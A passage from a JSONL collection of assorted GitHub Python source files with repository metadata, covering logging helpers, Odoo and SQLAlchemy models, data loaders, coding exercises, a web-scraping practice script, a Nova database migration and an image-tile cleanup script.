pprint.pformat(v))\n\treturn s\n\n# ############################### Assert ############################### #\ndef check(condition: bool, _msg_: str, **kwargs):\n\tif not condition:\n\t\tlogger.error(\"{}\\n{}\".format(_msg_, pstr(**kwargs)), extra=get_extra())\n\t\traise AssertionError()\n\ndef assert_(_msg_: str, **kwargs):\n\tlogger.error(\"{}\\n{}\".format(_msg_, pstr(**kwargs)), extra=get_extra())\n\traise AssertionError()\n\n# ############################### Sim log ############################### #\ndef slog(level: int, env, caller: str, _msg_: str, **kwargs):\n\tlevel_log_m[level](\"t: {:.2f}] {}: {}\\n{}\".format(env.now, caller, _msg_, pstr(**kwargs)), extra=get_extra())\n","repo_name":"mfatihaktas/edge-load-balance","sub_path":"debug_utils.py","file_name":"debug_utils.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73110541924","text":"# -*- coding: utf-8 -*-\nfrom odoo.exceptions import ValidationError\nfrom odoo import models, fields, api\n\n\nclass TodoTask(models.Model):\n\n _name = 'todo.task'\n _inherit = ['todo.task','mail.thread']\n\n\n\n user_id = fields.Many2one(comodel_name=\"res.users\", string=\"Responsable\", required=False, )\n date_deadline = fields.Date(string=\"Deadline\", required=False, )\n\n @api.multi\n def do_toggle_done(self):\n for task in self:\n if task.user_id != self.env.user:\n raise ValidationError ('seulr le responsable peux le faire')\n return super(TodoTask, self).do_toggle_done()\n\n\n\n\n\n\n # @api.model\n #def do_clear_done(self):\n # dones = self.search([('is_done', '=', True)])\n # dones.write({'active': False})\n # return True */","repo_name":"cheikhousy/KeyfaDev","sub_path":"customaddons/todo_user/todo_task.py","file_name":"todo_task.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42832171975","text":"import csv\nimport functools\nfrom hashlib import sha256\nfrom pathlib import Path\n\nimport numpy as np\nfrom nxontology import NXOntology\n\nfrom nxontology_ml.utils import ROOT_DIR\n\n\ndef read_training_data(\n take: int | None = None,\n filter_out_non_disease: bool = False,\n nxo: NXOntology[str] | None = None,\n data_path: Path = ROOT_DIR / \"data/efo_otar_slim_v3.43.0_rs_classification.tsv\",\n) -> tuple[np.ndarray, np.ndarray]:\n \"\"\"\n By default, the data is (consistently) shuffled\n \"\"\"\n # Get Ontology\n nxo = nxo or get_efo_otar_slim()\n nodes: set[str] = set(nxo.graph)\n\n # Get labelled data\n labelled_nodes: list[str] = []\n labels: list[str] = []\n with data_path.open(mode=\"r\") as f:\n for i, (efo_otar_slim_id, efo_label, rs_classification) in enumerate(\n csv.reader(f, delimiter=\"\\t\")\n ):\n if i == 0:\n # Skip header\n assert (efo_otar_slim_id, efo_label, rs_classification) == (\n \"efo_otar_slim_id\",\n \"efo_label\",\n \"rs_classification\",\n )\n elif filter_out_non_disease and rs_classification == \"04-non-disease\":\n continue\n else:\n if efo_otar_slim_id in nodes:\n labelled_nodes.append(efo_otar_slim_id)\n labels.append(rs_classification)\n\n # Consistent shuffling (i.e. sort by hash)\n z = list(zip(labelled_nodes, labels, strict=True))\n z.sort(key=lambda nl: sha256(nl[0].encode()).hexdigest())\n labelled_nodes, labels = zip(*z, strict=True) # type: ignore[assignment]\n\n if take:\n labelled_nodes = labelled_nodes[:take]\n labels = labels[:take]\n return np.array(labelled_nodes), np.array(labels)\n\n\nEFO_OTAR_SLIM_URL: str = \"https://github.com/related-sciences/nxontology-data/raw/2ce01d8495024d46cbc54fb0c26a92500ad717e0/efo_otar_slim.json\"\n\n\n@functools.cache\ndef get_efo_otar_slim(url: str = EFO_OTAR_SLIM_URL) -> NXOntology[str]:\n nxo = NXOntology[str].read_node_link_json(url)\n assert isinstance(nxo, NXOntology)\n nxo.freeze()\n return nxo\n","repo_name":"related-sciences/nxontology-ml","sub_path":"nxontology_ml/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"11729732746","text":"#!/usr/bin/python3\n'''Module that lists all State objects that contain the letter a'''\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport sys\nfrom model_state import Base, State\n\n\nif __name__ == '__main__':\n engine = create_engine('mysql+mysqldb://{}:{}@localhost:3306/{}'\n .format(sys.argv[1], sys.argv[2], sys.argv[3]),\n pool_pre_ping=True)\n\n Session = sessionmaker(engine)\n session = Session()\n\n states = session.query(State).filter(\n State.name.ilike('%a%')\n )\n for state in states:\n print(f\"{state.id}: {state.name}\")\n session.commit()\n session.close()\n","repo_name":"vsroyvs/holbertonschool-higher_level_programming","sub_path":"python-object_relational_mapping/9-model_state_filter_a.py","file_name":"9-model_state_filter_a.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1864814197","text":"from marshmallow import ValidationError, Schema\nfrom aiohttp import web\nfrom typing import Optional, Mapping, NoReturn\n\n\nclass CustomException(Exception):\n def __init__(self, message, status):\n self.message = message\n self.status = status\n\n\nasync def error_handler(\n error: ValidationError,\n req: web.Request,\n schema: Schema,\n error_status_code: Optional[int] = None,\n error_headers: Optional[Mapping[str, str]] = None,\n) -> NoReturn:\n raise CustomException(message=error.messages, status=422)\n\n\n@web.middleware\nasync def intercept_error(request, handler):\n try:\n return await handler(request)\n except CustomException as e:\n return web.json_response(e.message, status=e.status)\n","repo_name":"ViAchKoN/Projects-Python-BestJobApp","sub_path":"app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35918541103","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\ndef load_data_set(file_name):\r\n \"\"\" 加载数据集文件,没有返回类标号的函数 \"\"\"\r\n data_mat = []\r\n openfile = open(file_name)\r\n for line in openfile.readlines():\r\n cur_line = line.strip().split('\\t')\r\n float_line = list(map(float, cur_line))\r\n # if sum(floatLine) != 0:\r\n data_mat.append(float_line)\r\n return data_mat\r\n","repo_name":"guoweikuang/analyse_web","sub_path":"weibo_showing/app/python_analyse/load_data_set.py","file_name":"load_data_set.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34099632872","text":"import sys\nimport json\nimport pandas as pd\nimport numpy as np\nimport sparse\nimport os\nimport gc\nimport time\n\nfrom os.path import dirname, abspath, join\nfrom omop_learn.utils.data_utils import to_unixtime, from_unixtime\nfrom omop_learn.data.common import ConceptTokenizer\n\ndef process_line(line):\n '''\n Process line of data into a json object with visit dates and times\n @param line: str\n @return: json object\n '''\n example = json.loads(line)\n dates = example['dates']\n unix_times = to_unixtime(dates)\n example['unix_times'] = unix_times\n\n # make sure visits are sorted by date\n sorted_visits = [v for d, v in sorted(zip(example['unix_times'], example['visits']))]\n example['visits'] = sorted_visits\n example['unix_times'] = sorted(example['unix_times'])\n example['dates'] = sorted(example['dates'])\n\n return example\n\ndef build_3d_sparse_feature_matrix(tokenizer,\n data_folder,\n logger):\n '''\n Build sparse feature matrix\n Writes intermediate chunks to disk to run faster\n @param tokenizer: ConceptTokenizer\n @param data_folder: str, folder containing data.json\n @param logger: logger, for INFO messages\n @return: 1. 3d sparse feature matrix\n 2. list of times corresponding to dim 1 in matrix\n 3. list of person_ids corresponding to dim 0 in matrix\n '''\n chunk_size = 10000\n final_chunk_file = data_folder + 'sparse_matrix_components_chunks_finished.txt'\n if os.path.exists(final_chunk_file):\n with open(final_chunk_file, 'r') as f:\n final_chunk_text = f.read()\n num_people = int(final_chunk_text.split(' ')[1])\n else:\n # Build 3d sparse feature matrix\n # After every chunk of samples, save to disk and start building these again from an empty list\n concepts = []\n times = []\n persons = []\n times_set = set()\n person_ids = []\n\n # Build in smaller chunks of samples and then extend overall lists above\n small_chunk_size = 100\n small_chunk_concepts = []\n small_chunk_times = []\n small_chunk_persons = []\n small_chunk_times_set = set()\n small_chunk_person_ids = []\n\n start_time = time.time()\n # Process the json data file by line\n # A line constitutes an entire person worth of data\n with open(data_folder + 'data.json', 'r') as json_fh:\n for person_id, line in enumerate(json_fh):\n\n # This is a person\n example = process_line(line)\n small_chunk_person_ids.append(example['person_id'])\n\n # These are the visits, which can have many concepts each\n for i, v in enumerate(example['unix_times']):\n\n # This is the number of concepts in this visit\n visit_concept_num = len(example['visits'][i])\n\n # Extend lists by the number of concepts in this visit\n small_chunk_concepts.extend(example['visits'][i])\n small_chunk_times.extend([v]*visit_concept_num)\n small_chunk_persons.extend([person_id]*visit_concept_num)\n\n # Make a time set for use in mapping later\n small_chunk_times_set.add(v)\n del example\n\n if person_id % small_chunk_size == small_chunk_size - 1:\n # add these small chunks of samples to larger chunks\n concepts.extend(small_chunk_concepts)\n times.extend(small_chunk_times)\n persons.extend(small_chunk_persons)\n times_set = times_set.union(small_chunk_times_set)\n person_ids.extend(small_chunk_person_ids)\n small_chunk_concepts = []\n small_chunk_times = []\n small_chunk_persons = []\n small_chunk_times_set = set()\n small_chunk_person_ids = []\n gc.collect()\n logger.info('Processed ' + str(person_id + 1) + ' people in sparse feature matrix creation in '\n + str(time.time() - start_time) + ' seconds')\n\n if person_id % chunk_size == chunk_size - 1:\n # save chunk to disk\n save_start_time = time.time()\n concepts_mapped = tokenizer.concepts_to_ids(concepts)\n with open(data_folder + 'sparse_matrix_components_chunk' + str(person_id + 1) + '.json', 'w') as f:\n json_contents = {'concepts_mapped': concepts_mapped,\n 'times' : times,\n 'times_set' : list(times_set),\n 'persons' : persons,\n 'person_ids' : person_ids}\n json.dump(json_contents, f)\n del concepts_mapped\n concepts = []\n times = []\n persons = []\n times_set = set()\n person_ids = []\n logger.info('Saved chunk ' + str(person_id + 1) + ' to disk in '\n + str(time.time() - save_start_time) + ' seconds')\n\n num_people = person_id + 1\n if len(small_chunk_person_ids) > 0:\n concepts.extend(small_chunk_concepts)\n times.extend(small_chunk_times)\n persons.extend(small_chunk_persons)\n times_set = times_set.union(small_chunk_times_set)\n person_ids.extend(small_chunk_person_ids)\n del small_chunk_concepts\n del small_chunk_times\n del small_chunk_persons\n del small_chunk_times_set\n del small_chunk_person_ids\n \n if len(person_ids) > 0:\n # save remaining samples after last complete chunk to disk\n save_start_time = time.time()\n concepts_mapped = tokenizer.concepts_to_ids(concepts)\n with open(data_folder + 'sparse_matrix_components_chunk' + str(num_people) + '.json', 'w') as f:\n json_contents = {'concepts_mapped': concepts_mapped,\n 'times' : times,\n 'times_set' : list(times_set),\n 'persons' : persons,\n 'person_ids' : person_ids}\n json.dump(json_contents, f)\n del json_contents\n del concepts_mapped\n del concepts\n del times\n del persons\n del times_set\n del person_ids\n gc.collect()\n logger.info('Saved last chunk ' + str(num_people) + ' to disk in '\n + str(time.time() - save_start_time) + ' seconds')\n else:\n logger.info('Last chunk already contained all people. No additional chunk to save to disk.')\n with open(data_folder + 'sparse_matrix_components_chunks_finished.txt', 'w') as f:\n f.write('Saved ' + str(num_people) + ' people in chunks to disk for sparse feature matrix creation')\n\n logger.info('Finished processing all ' + str(num_people) + ' people to chunks in sparse feature matrix creation in '\n + str(time.time() - start_time) + ' seconds')\n \n # Read all chunks back to create sparse matrix\n start_time = time.time()\n concepts_mapped_list_over_chunks = []\n times_list_over_chunks = []\n all_times_set = set()\n persons_list_over_chunks = []\n person_ids_list_over_chunks = []\n chunk_end = chunk_size\n while chunk_end < num_people:\n # load chunk\n with open(data_folder + 'sparse_matrix_components_chunk' + str(chunk_end) + '.json', 'r') as f:\n json_contents = json.load(f)\n concepts_mapped_list_over_chunks.append(np.array(json_contents['concepts_mapped']))\n times_list_over_chunks.append(json_contents['times'])\n all_times_set = all_times_set.union(set(json_contents['times_set']))\n persons_list_over_chunks.append(np.array(json_contents['persons']))\n person_ids_list_over_chunks.append(np.array(json_contents['person_ids']))\n logger.info('Loaded chunks of ' + str(chunk_end) + ' people in ' \n + str(time.time() - start_time) + ' seconds')\n chunk_end += chunk_size\n \n if num_people % chunk_size != 0:\n # load last chunk\n with open(data_folder + 'sparse_matrix_components_chunk' + str(num_people) + '.json', 'r') as f:\n json_contents = json.load(f)\n concepts_mapped_list_over_chunks.append(np.array(json_contents['concepts_mapped']))\n times_list_over_chunks.append(json_contents['times'])\n all_times_set = all_times_set.union(set(json_contents['times_set']))\n persons_list_over_chunks.append(np.array(json_contents['persons']))\n person_ids_list_over_chunks.append(np.array(json_contents['person_ids']))\n logger.info('Loaded all chunks of ' + str(num_people) + ' people in '\n + str(time.time() - start_time) + ' seconds')\n \n # Now make a dict of our times\n start_time = time.time()\n all_times_list = sorted(list(all_times_set))\n del all_times_set\n all_times_map = {visit_time: i for i, visit_time in enumerate(all_times_list)}\n\n # Equivalent to ConceptTokenizer concepts_to_ids\n all_times_mapped_list_over_chunks = []\n for chunk_times in times_list_over_chunks:\n chunk_times_mapped = np.empty(len(chunk_times), dtype=int)\n for idx in range(len(chunk_times)):\n chunk_times_mapped[idx] = all_times_map[chunk_times[idx]]\n all_times_mapped_list_over_chunks.append(chunk_times_mapped)\n del times_list_over_chunks\n gc.collect()\n logger.info('Mapped times to indices in ' + str(time.time() - start_time) + ' seconds')\n \n # Now concatenate all lists over chunks\n start_time = time.time()\n all_concepts_mapped = np.concatenate(concepts_mapped_list_over_chunks)\n all_times_mapped = np.concatenate(all_times_mapped_list_over_chunks)\n all_persons = np.concatenate(persons_list_over_chunks)\n all_person_ids = np.concatenate(person_ids_list_over_chunks)\n del concepts_mapped_list_over_chunks\n del all_times_mapped_list_over_chunks\n del persons_list_over_chunks\n del person_ids_list_over_chunks\n gc.collect()\n logger.info('Concatenated all chunks in ' + str(time.time() - start_time) + ' seconds')\n\n # Build 3D sparse matrix representation of the data\n # persons x times x concepts\n start_time = time.time()\n feature_matrix = sparse.COO(\n [all_persons, all_times_mapped, all_concepts_mapped], 1, \n shape=(len(set(all_persons)), \n len(all_times_map), \n len(tokenizer.concept_map))\n )\n del all_persons\n del all_times_mapped\n del all_concepts_mapped\n gc.collect()\n logger.info('Built 3d sparse matrix in ' + str(time.time() - start_time) + ' seconds')\n \n return feature_matrix, all_times_list, all_person_ids","repo_name":"clinicalml/large-scale-temporal-shift-study","sub_path":"utils/omop_windowed_utils.py","file_name":"omop_windowed_utils.py","file_ext":"py","file_size_in_byte":11393,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"21684919901","text":"\"\"\"\n•• P3.3 Write a program that reads an integer and prints how many digits the number has, by \nchecking whether the number is � 10, � 100, and so on. (Assume that all integers are\nless than ten billion.) If the number is negative, first multiply it by –1.\n\"\"\"\n#My approach\ndef main():\n user_input = input(\"Please enter your number: \")\n length = len(user_input)\n if user_input[0] == '-':\n length = len(user_input) - 1\n print(f\"{length}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"borzoian40/Python-For-Everyone-Horstmann","sub_path":"Chapter 3/P3.03.py","file_name":"P3.03.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1688307075","text":"from collections import deque\n\n\ndef solution():\n # 테스트 케이스의 개수(num_tc) 입력받기\n num_tc = int(input())\n for tc in range(num_tc):\n # 팀의 수(num_t) 입력받기\n num_t = int(input())\n # 각 팀의 순위(rank_t) 입력받기\n rank_t = list(map(int, input().split()))\n # 각 팀의 진입차수를 '0'으로 초기화\n in_degree = [0] * (num_t + 1)\n graph_r = [[False] * (num_t + 1) for _ in range(num_t + 1)]\n for i in range(num_t - 1):\n for j in range(i + 1, num_t):\n graph_r[rank_t[i]][rank_t[j]] = True\n in_degree[rank_t[j]] += 1\n # 상대적 등수가 바뀐 팀의 수\n num_c = int(input())\n for _ in range(num_c):\n a, b = map(int, input().split())\n\n if graph_r[a][b]:\n graph_r[a][b] = False\n graph_r[b][a] = True\n in_degree[b] -= 1\n in_degree[a] += 1\n else:\n graph_r[a][b] = True\n graph_r[b][a] = False\n in_degree[a] -= 1\n in_degree[b] += 1\n\n que_a = deque()\n answer = []\n\n for i in range(1, num_t + 1):\n if in_degree[i] == 0:\n que_a.append(i)\n\n check_cycle = False\n check_only = True\n # 순위대로 정렬되어야 하므로 큐의 원소는 1개로 유지되어야 한다.\n for _ in range(1, num_t + 1):\n # 큐에 원소가 없을 경우에, 사이클이 발생했다고 판명\n if len(que_a) == 0:\n check_cycle = True\n break\n # 큐에 원소가 2개이상 있을 때, 원소들 간의 순위를 매길 수 없다고 판명\n if len(que_a) > 1:\n check_only = False\n break\n\n now = que_a.popleft()\n answer.append(now)\n\n for i in range(1, num_t + 1):\n if graph_r[now][i]:\n in_degree[i] -= 1\n\n if in_degree[i] == 0:\n que_a.append(i)\n\n if check_cycle:\n print(\"IMPOSSIBLE\")\n\n elif not check_only:\n print(\"?\")\n\n else:\n for a in answer:\n print(a, end=\" \")\n print()\n\n return\n\n\nprint(solution())\n","repo_name":"junho-devv/algorithm-study","sub_path":"BACKJOONㅣ백준/단계별로 풀어보기/기타/3665_최종 순위.py","file_name":"3665_최종 순위.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26157674184","text":"\"\"\"Practicing some basic web scraping\n\nI am using the O'Reilly book, \"Web Scraping with Python\" by Ryan Mitchell.\nIt's a very readable book for a technical book.\n\nThis will just be basic demonstrations. No deep scraping of a website(s)\nas I don't want to get in trouble.\n\"\"\"\n\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom bs4 import BeautifulSoup\nimport sys, logging, requests\n\n__author__ = 'rnzucker'\n\nlogging.basicConfig(stream=sys.stderr, level=logging.DEBUG)\n\ndef id_spoof():\n \"\"\"Simple browser agent spoofing\n \"\"\"\n session = requests.Session()\n headers = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0\",\n \"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\"}\n # Check to\n url = \"https://www.whatismybrowser.com/developers/what-http-headers-is-my-browser-sending\"\n req = session.get(url, headers=headers)\n\n bsObj = BeautifulSoup(req.text, \"html.parser\")\n print(bsObj.find(\"table\",{\"class\":\"table-striped\"}).get_text)\n\ndef main():\n # id_spoof()\n # try:\n # html = urlopen(\"http://www.pythonscraping.com/pages/page1.html\")\n # except HTTPError as e:\n # print(e)\n # return\n # if html is None:\n # print(\"URL is not found\")\n # return\n r = requests.get(\"http://www.pythonscraping.com/pages/page1.html\")\n # bsObj = BeautifulSoup(html.read(), \"html.parser\")\n print(r.text)\n bsObj = BeautifulSoup(r.text, \"html.parser\")\n # print(bsObj.h1)\n print(bsObj.body)\n\n\n\nmain()\n","repo_name":"rnzucker/web-scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27752747518","text":"print('''\n1 - File Duplo\n2 - Alcatra\n3 - Picanha\n''')\ndesconto = 0\ntipo_carne = int(input(\"Tipo de carne: \"))\nquantidade = float(input(\"Quantidade em Kg: \"))\nforma_pagamento = input(\"Forma de pagamento (Dinheiro / Cartão): \").lower()\n\nif tipo_carne == 1:\n if quantidade <= 5:\n preco_total = quantidade * 34.90\n else:\n preco_total = quantidade * 35.80\n carne = \"File Duplo\"\nelif tipo_carne == 2:\n if quantidade <= 5:\n preco_total = quantidade * 44.90\n else:\n preco_total = quantidade * 46.80\n carne = \"Alcatra\"\nelif tipo_carne == 3:\n if quantidade <= 5:\n preco_total = quantidade * 66.90\n else:\n preco_total = quantidade * 67.80\n carne = \"Picanha\"\nelse:\n print(\"Opção inválida. Por favor, escolha um número entre 1 e 3.\")\n exit()\n\nif forma_pagamento == \"cartão\":\n desconto = preco_total * 0.05\n\nvalor_a_pagar = preco_total - desconto\n\nprint(f'''\nTipo de carne: {carne}\nQuantidade: {quantidade:.2f} Kg\nPreço total: R${preco_total:.2f}\nForma de pagamento: {forma_pagamento}\nDesconto: R${desconto:.2f}\nValor a pagar: R${valor_a_pagar:.2f}\n''')","repo_name":"LightHades/atividades-python","sub_path":"ex35.py","file_name":"ex35.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"755466264","text":"DEBUG_LEVEL = 2\n\n\n\nimport pygame as pg\ndef check_mouseover(rect):\n mos_x, mos_y = pg.mouse.get_pos()\n if mos_x > rect.left and mos_x < rect.right and mos_y > rect.top and mos_y < rect.bottom:\n return True\n else:\n return False\n\ndef debug_msg(msg,lvl):\n if DEBUG_LEVEL >= lvl:\n print(msg)\n\ndef filter_list(targets,search):\n for target in targets:\n for target_name in target:\n if target_name == search:\n return target[search]\ndef adjust_hsla(in_color,hsla_delta):\n in_color = list(in_color)\n hsla_delta = list(hsla_delta)\n out_color = []\n min_num = 0\n max_num = 100\n for i in range(len(in_color)):\n out = in_color[i] + hsla_delta[i]\n if out > max_num:\n out = max_num\n elif out < min_num:\n out = min_num\n out_color.append(out)\n return tuple(out_color)\n \n \ndef color_from_hsla(h,s,l,a):\n color = pg.Color(0)\n color.hsla = h,s,l,a\n return color\n\ndef color_to_hsla(r,g,b,a=255):\n return pg.Color(r,g,b,a).hsla \n \n\n'''\nexpected_vals = [0,1,2,3,4,4,3,2,1,0]\n\ndef constrain_val(in_val,val_min,val_max,method): \n if in_val > val_min and in_val < val_max: # Value is within the boundries, do nothing\n return in_val\n\n val = in_val\n out_val = 0\n if val_min != 0: # if min bound is not 0\n offset = val_min # define how far min_val is from 0, called 'offset'\n else: #\n offset = 0 # \n val -= offset # move everything down by offset\n val_min -= offset #\n val_max -= offset #\n val_range = (val_max-val_min) + 1 # range should be one more than the max - min\n\n\n if method == \"clamp\":\n # Clamp method - Clamps the returned number at the boundry\n # min_val if below boundry\n # max_val if above boundry\n if val < min_val:\n out_val = min_val\n else:\n out_val = max_val\n\n\n if method == \"zigzag\":\n val %= (val_range * 2)\n in_1n_range = (val >= val_min) and (val <= val_max)\n val = val if in_1n_range else val-1\n out_val = val_max - abs(val_max - val - 1)\n if method == \"overflow\":\n out_val = val % (val_max + 1)\n test = 0\n\n return out_val\n\n\ntest_range_min = 0\ntest_range_max = 100\nmin_bound = 0\nmax_bound = 4\nmethod = \"zigzag\"\nprint(\"Testing {} method with bounds {} to {} from inputs {} to {}\".format(method,min_bound,max_bound,test_range_min,test_range_max))\nfor i in range(test_range_min,test_range_max):\n \n n = constrain_val(i,min_bound,max_bound,method)\n is_test_passed = False\n if n == expected_vals[i % (len(expected_vals)-1)]:\n is_test_passed = True\n print(\"{} - [{}] = {}\".format(is_test_passed,i,n))\n\n'''","repo_name":"benczech212/Py_Bingo","sub_path":"game/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36556845830","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\"\"\"Database migrations for resource-providers.\"\"\"\n\nfrom migrate import UniqueConstraint\nfrom sqlalchemy import Column\nfrom sqlalchemy import DateTime\nfrom sqlalchemy import Float\nfrom sqlalchemy import Index\nfrom sqlalchemy import Integer\nfrom sqlalchemy import MetaData\nfrom sqlalchemy import String\nfrom sqlalchemy import Table\nfrom sqlalchemy import Unicode\n\n\ndef upgrade(migrate_engine):\n meta = MetaData()\n meta.bind = migrate_engine\n\n if migrate_engine.name == 'mysql':\n nameargs = {'collation': 'utf8_bin'}\n else:\n nameargs = {}\n resource_providers = Table(\n 'resource_providers', meta,\n Column('created_at', DateTime),\n Column('updated_at', DateTime),\n Column('id', Integer, primary_key=True, nullable=False),\n Column('uuid', String(36), nullable=False),\n Column('name', Unicode(200, **nameargs), nullable=True),\n Column('generation', Integer, default=0),\n Column('can_host', Integer, default=0),\n UniqueConstraint('uuid', name='uniq_resource_providers0uuid'),\n UniqueConstraint('name', name='uniq_resource_providers0name'),\n Index('resource_providers_name_idx', 'name'),\n Index('resource_providers_uuid_idx', 'uuid'),\n mysql_engine='InnoDB',\n mysql_charset='latin1'\n )\n\n inventories = Table(\n 'inventories', meta,\n Column('created_at', DateTime),\n Column('updated_at', DateTime),\n Column('id', Integer, primary_key=True, nullable=False),\n Column('resource_provider_id', Integer, nullable=False),\n Column('resource_class_id', Integer, nullable=False),\n Column('total', Integer, nullable=False),\n Column('reserved', Integer, nullable=False),\n Column('min_unit', Integer, nullable=False),\n Column('max_unit', Integer, nullable=False),\n Column('step_size', Integer, nullable=False),\n Column('allocation_ratio', Float, nullable=False),\n Index('inventories_resource_provider_id_idx',\n 'resource_provider_id'),\n Index('inventories_resource_provider_resource_class_idx',\n 'resource_provider_id', 'resource_class_id'),\n Index('inventories_resource_class_id_idx',\n 'resource_class_id'),\n UniqueConstraint('resource_provider_id', 'resource_class_id',\n name='uniq_inventories0resource_provider_resource_class'),\n mysql_engine='InnoDB',\n mysql_charset='latin1'\n )\n\n allocations = Table(\n 'allocations', meta,\n Column('created_at', DateTime),\n Column('updated_at', DateTime),\n Column('id', Integer, primary_key=True, nullable=False),\n Column('resource_provider_id', Integer, nullable=False),\n Column('consumer_id', String(36), nullable=False),\n Column('resource_class_id', Integer, nullable=False),\n Column('used', Integer, nullable=False),\n Index('allocations_resource_provider_class_used_idx',\n 'resource_provider_id', 'resource_class_id',\n 'used'),\n Index('allocations_resource_class_id_idx',\n 'resource_class_id'),\n Index('allocations_consumer_id_idx', 'consumer_id'),\n mysql_engine='InnoDB',\n mysql_charset='latin1'\n )\n\n resource_provider_aggregates = Table(\n 'resource_provider_aggregates', meta,\n Column('created_at', DateTime),\n Column('updated_at', DateTime),\n Column('resource_provider_id', Integer, primary_key=True,\n nullable=False),\n Column('aggregate_id', Integer, primary_key=True, nullable=False),\n Index('resource_provider_aggregates_aggregate_id_idx',\n 'aggregate_id'),\n mysql_engine='InnoDB',\n mysql_charset='latin1'\n )\n\n for table in [resource_providers, inventories, allocations,\n resource_provider_aggregates]:\n table.create(checkfirst=True)\n","repo_name":"starlingx-staging/stx-nova","sub_path":"nova/db/sqlalchemy/api_migrations/migrate_repo/versions/016_resource_providers.py","file_name":"016_resource_providers.py","file_ext":"py","file_size_in_byte":4495,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"12817178877","text":"import sys\nfrom collections import deque\n\n\ndef solution():\n global n, tree\n\n answer = {i:0 for i in range(2, n+1)}\n v = [0 for _ in range(n+1)]\n q = deque()\n q.append(1)\n v[1] = 1\n\n while q:\n parent = q.pop()\n for c in tree[parent]:\n if v[c]:\n continue\n\n answer[c] = parent\n v[c] = 1\n q.append(c)\n\n for p in answer.values():\n print(p)\n\n\nn = int(sys.stdin.readline())\ntree = {i:[] for i in range(1, n+1)}\nfor i in range(n-1):\n k, v = map(int, sys.stdin.readline().strip().split(\" \"))\n tree[k].append(v)\n tree[v].append(k)\n\nsolution()","repo_name":"galid1/Algorithm","sub_path":"python/baekjoon/2.algorithm/DFS_BFS/백준_트리의_부모_찾기.py","file_name":"백준_트리의_부모_찾기.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"5139886506","text":"import rasterio\nimport os, glob\nimport numpy as np\nfrom tqdm import tqdm\n\ndef remove_img_nodata(fp_img_mask_check, fp_img, percent_zeros=90):\n with rasterio.open(fp_img_mask_check) as src:\n img = src.read()\n number_pixel = src.height*src.width\n\n number_pixel_0 = np.count_nonzero(img==0)\n if number_pixel_0/number_pixel > percent_zeros/100:\n if os.path.exists(fp_img_mask_check):\n os.remove(fp_img_mask_check)\n else:\n print(\"The file mask does not exist\")\n\n if os.path.exists(fp_img):\n os.remove(fp_img)\n else:\n print(\"The file img does not exist\")\n\n\n# def remove_img_nodata(fp_img_mask_check, fp_img, percent_zeros=90):\n# with rasterio.open(fp_img) as src:\n# img = src.read()\n# number_pixel = src.height*src.width\n\n \n# if np.all(img == 0):\n# if os.path.exists(fp_img_mask_check):\n# os.remove(fp_img_mask_check)\n# else:\n# print(\"The file mask does not exist\")\n\n# if os.path.exists(fp_img):\n# os.remove(fp_img)\n# else:\n# print(\"The file img does not exist\")\n\n\ndef get_list_name_fp(folder_dir, type_file = '*.tif'):\n \"\"\"\n Get all file path with file type is type_file.\n \"\"\"\n list_fp = []\n for file_ in glob.glob(os.path.join(folder_dir, type_file)):\n head, tail = os.path.split(file_)\n # list_fp.append(os.path.join(head, tail))\n list_fp.append(tail)\n return list_fp\n\nfd_img = r\"/home/skm/SKM16/Data/ThaiLandChangeDetection/BD_Chang/Data_Train_and_Model/cut256_128/image_cut_img_crop\"\nfd_img_mask_check = r\"/home/skm/SKM16/Data/ThaiLandChangeDetection/BD_Chang/Data_Train_and_Model/cut256_128/image_cut_img_mask_crop\"\n\nlist_name = get_list_name_fp(fd_img_mask_check)\n\ni = 0\nsum_all = len(list_name)\nphan_tram = 10\nnum_get = 